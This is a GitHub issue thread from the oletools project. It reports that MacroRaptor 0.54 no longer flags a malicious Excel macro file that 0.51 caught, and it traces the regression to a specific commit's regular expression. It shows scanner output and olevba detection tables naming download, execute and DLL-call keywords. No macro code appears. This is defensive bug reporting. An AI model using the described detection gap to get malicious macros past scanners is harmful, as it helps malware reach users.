Regression: mraptor no longer detects malicious macro in xlsm file

robert-scheck commented 3 years ago

The mraptor-2 command uses Python 2.7, the mraptor-3 uses Python 3.6, both on CentOS 7 (x86_64). The file is indeed the same, and the file still should be treated as malicious, thus this issue seems to be a regression in mraptor introduced somewhen after oletools 0.51.

$ mraptor-2 virusexcel.xlsm 
MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
SUSPICIOUS|AWX  |OpX |virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 20 - SUSPICIOUS
$

$ mraptor-2 virusexcel.xlsm
MacroRaptor 0.54 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$
$ mraptor-3 virusexcel.xlsm
MacroRaptor 0.54 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$

$ sha256sum virusexcel.xlsm 
adc078982da3f9a8d343d51f91805ad63d4e9afd060a23f47bc5cecf293f386e  virusexcel.xlsm
$

Interestingly, olevba seems to treat the file still right, so the issue might be limited to mraptor?

$ olevba-2 -a virusexcel.xlsm 
olevba 0.51 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:M-S-H--- virusexcel.xlsm
===============================================================================
FILE: virusexcel.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet2'
-------------------------------------------------------------------------------
VBA MACRO Sheet3.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet3'
-------------------------------------------------------------------------------
VBA MACRO Sheet4.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet4'
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | Run                | May run an executable file or a system  |
|            |                    | command                                 |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
|            |                    | be used to obfuscate strings (option    |
|            |                    | --decode to see all)                    |
+------------+--------------------+-----------------------------------------+

$

$ olevba-3 -a virusexcel.xlsm 
olevba 0.54.2 on Python 3.6.8 - http://decalage.info/python/oletools
===============================================================================
FILE: virusexcel.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet2'
-------------------------------------------------------------------------------
VBA MACRO Sheet3.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet3'
-------------------------------------------------------------------------------
VBA MACRO Sheet4.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet4'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Lib                 |May run code from a DLL                      |
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

$

robert-scheck commented 3 years ago

The regression was introduced by commit ca75f0085104d01bddb283a53bd9c6af6affbf92, because:

$ wget -q https://raw.githubusercontent.com/decalage2/oletools/f56062def0e72718201c50392d866c2cdbeb3b7e/oletools/mraptor.py -O mraptor-f56062d.py
$ python3 mraptor-f56062d.py virusexcel.xlsm
MacroRaptor 0.54dev14 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
SUSPICIOUS|AWX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 20 - SUSPICIOUS
$

$ wget -q https://raw.githubusercontent.com/decalage2/oletools/ca75f0085104d01bddb283a53bd9c6af6affbf92/oletools/mraptor.py -O mraptor-ca75f00.py
$ python3 mraptor-ca75f00.py virusexcel.xlsm
MacroRaptor 0.54dev14 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$

From my point of view the regular expression in line 120 was adapted wrongly.

sbidy commented 3 years ago

Are there any updates on that topic?

decalage2 / oletools

Regression: mraptor no longer detects malicious macro in xlsm file #659